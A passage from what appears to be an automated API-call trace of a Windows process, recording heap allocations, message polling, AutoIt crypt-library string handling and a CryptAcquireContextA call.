Size=0x8) returned 0x2e54db8 [0233.741] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.741] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0233.741] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0233.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0233.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0233.742] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0233.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0233.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0233.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0233.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0233.742] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0233.743] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0233.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0233.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0233.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0233.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0233.744] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0233.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0233.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0233.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.744] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0233.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0233.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0233.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0233.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0233.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0233.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0233.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0233.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0233.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0233.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0233.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0233.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0233.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0233.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0233.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0233.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0233.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0233.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0233.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0233.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0233.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0233.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0233.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0233.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0233.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0233.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0233.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0233.749] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0233.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0233.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0233.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0233.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0233.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b48 [0233.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0233.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0233.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0233.750] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0233.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0233.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0233.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0233.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0233.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0233.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0233.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0233.751] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0233.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0233.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0233.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0233.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0233.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0233.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0233.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0233.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.753] HeapFree (in: 